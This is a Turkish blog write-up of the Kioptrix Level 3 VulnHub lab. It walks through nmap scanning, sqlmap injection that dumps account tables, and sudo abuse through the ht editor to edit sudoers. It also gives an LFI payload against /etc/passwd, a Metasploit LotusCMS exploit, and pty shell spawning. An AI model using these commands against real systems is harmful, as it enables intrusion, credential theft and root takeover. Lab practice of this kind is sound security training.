Sızma Testi Örnekleri Kioptrix Level 3

Sızma Testi Örnekleri:Kioptrix Level 3

Kioptrix level 2 den birazcık daha zor ama oldukça zevkli ve düşündürücü oldu benim için. Birkaç yeni bilgi edindim bu makine sayesinde. Sizlerinde öğreneceğinizi tahmin ediyorum. Lafı uzatmadan başlayalım.

Sızma Testi Örnekleri:Kioptrix level 1
Sızma Testi Örnekleri:Kioptrix Level 2

Kioptrix Level 3 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

İlk olarak netdiscover ile hedef makinenin ip adresini bulalım.

netdisover -r 192.168.0.0/16

Nmap ile makineyi detaylı tarama yaptığımızda aslında bilmemiz gereken çoğu şeyi gösteriyor bize

nmap -sS -p- 192.168.42.55 -n –script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 11:20 AKDT
Nmap scan report for 192.168.42.55
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.55
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.42.55:80/gallery/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.42.55:80/index.php?system=Admin
|     Form id: contactform
|     Form action: index.php?system=Admin&page=loginSubmit
|     
|     Path: http://192.168.42.55:80/index.php?system=Blog&post=1281005380
|     Form id: commentform
|     Form action: 
|     
|     Path: http://192.168.42.55:80/gallery/index.php
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.42.55:80/gallery/gadmin/
|     Form id: username
|     Form action: index.php?task=signin
|     
|     Path: http://192.168.42.55:80/index.php?system=Admin&page=loginSubmit
|     Form id: contactform
|_    Form action: index.php?system=Admin&page=loginSubmit
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|   /cache/: Potentially interesting folder
|   /core/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /style/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=loginSubmit%27%20OR%20sqlspider&system=Admin
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider
|_    http://192.168.42.55:80/index.php?page=loginSubmit%27%20OR%20sqlspider&system=Admin
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:67:96:F9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 323.17 seconds

Kioptrix Level 3 WEB

Webden ilerlemeden önce kioptrix makinesinin giriş ekranındaki bilgiyi ciddiye almakta fayda var.

etc dizini altında bulunan hosts dosyasına gereken ayarı yapalım.

nano /etc/hosts

Şimdi web üzerinden ilerleyebiliriz.Bizi şöyle bir web sayfası karşılıyor.

Giriş sayfasındaki yazının en altında bulunan “now” bağlantısına tıklıyorum ve eğlenceli bir sayfa çıkıyor karşımıza.

Size eğlenceli ve masum gelebilir ama sayfanın sol altında bulunan butonda sıralamayla oynadıktan sonra URL kısmında tehlikeyi hissedebilirsiniz 🙂

id kısmına ufak bir tırnak herşeyi mahvedebilir.

Şimdi sqlmap ile kolay bir şekilde kritik bilgilere ulaşabiliriz.

sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” –dbs

gallery veritabanına girelim ve tablolara göz atalım.

sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” -D gallery –tables

Kullanıcı bilgilerinin burda olduğu aşikar.Dump edelim

sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” -D gallery -T dev_accounts –dump

İhtiyacımız olan tam da buydu.Şimdi ssh ile devam edelim bakalım bilgiler işe yarayacakmı.

ssh loneferret@kioptrix3.com

Bulunduğum dizinde “CompanyPolicy.README” isimli bir dosya var.İçinde ht editörü sudo ile açmamı istediği yazıyordu. “sudo -l” komutu ile baktığımda şifresiz olarak ht editörü açabileceğimi gördüm.Bu bizim için çok iyi bir haber.

Tabi ht editörü açmam için environment değerini değiştirmem gerekecek.

echo $TERM
export TERM=xterm-color
sudo ht

ht editörü ile etc dizini altında bulunan sudoers dosyasını açıp ufak bir değişiklik ile root olabiliriz.Ht editörde dosya açmak için F3 tuşuna basın ve dosya yolunu girin.

loneferret kullanıcısına şifresiz çalıştırabileceği yeni path olarak /bin/sh girersek root olabiliriz.(virgül koymayı unutmayın ) F2 ile kaydedip çıkalım.

sudo -l komutu ile tekrar kontrol ettiğimde şifresiz olarak çalıştırabileceğimi görüyorum.Ve sonuç ..

/root dizini altında bulunan Congrats.txt dosyasını okuyup bitirebiliz. Ama daha da ilerleyebiliriz bence.

Web sayfasında gezinirken url kısmına gözüm çarptı ve lfi olabileceğinden şüphelendim.Haklıydımda./etc/passwd dosyasını okuyabildim.

Ilgili zafiyet:

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg

Aynı zamanda anasayfada menüde bir de login vardı.Girdiğimde karşıma şöyle bir login ekranı çıktı ve bilin bakalım aşağı ne yazıyordu ?

Sızma testi örnekleri serisinin ilk yazısında lotuscms in nasıl sömürüleceğinden bahsetmiştim.Aynen devam.

use exploit/multi/http/lcms_php_exec
set RHOSTS kioptrix3.com
set URI /
exploit

İnteraktif shell e geçmek için ;

shell
python -c “import pyt;pty.spawn(‘/bin/bash’)”

Son olarak nikto ile tarama yaptığımda ve tabi nmap sonucunda da çıktığı üzere phpmyadmin vardı.

makinede /www/kioptrix3.com/gallery dizini altında bulunan gconfig.php yi açtığımda phpmyadmin giriş bilgilerini elde ettim.

Phpmyadmin e girip bilgileri kullandığımda başarılı oldum.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir